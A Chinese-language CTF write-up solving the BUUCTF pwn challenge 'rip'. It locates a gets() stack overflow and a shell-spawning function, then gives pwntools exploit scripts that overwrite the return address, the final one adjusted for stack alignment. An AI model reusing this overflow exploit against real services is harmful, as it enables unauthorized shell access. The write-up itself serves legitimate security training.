BUUCTF-PWN-rip

checksec

image-20211102205802821

IDA

image-20211102205855096

很明显gets函数有溢出漏洞,s的栈情况如下:

image-20211102210127998

完全覆盖需要(0xF + 0x8)的长度

image-20211102205938771

找到函数fun(可以直接拿到shell)

fun_addr: 0x401186

image-20211102210257520

测试EXP

1
2
3
4
5
6
7
8
9
10
from pwn import *

# p = process('./pwn1')
p = remote('node4.buuoj.cn', 27723)

payload = b'a' * (0xF + 8) + p64(0x401186)

# p.recv()
p.sendline(payload)
p.interactive()

测试结果

image-20211102210509872

测试结果是打通了,但是报timeout,于是去找原因:

参考文章:http://blog.eonew.cn/archives/958

主要原因文章中提到了,是因为没有对齐,所以根据文章中的解决方案:

image-20211102211059149

最终EXP

1
2
3
4
5
6
7
8
9
10
from pwn import *

# p = process('./pwn1')
p = remote('node4.buuoj.cn', 27723)

payload = b'a' * (0xF + 8) + p64(0x401187) # 在原来的地址上+1刚刚好

# p.recv()
p.sendline(payload)
p.interactive()

结果

image-20211102211347467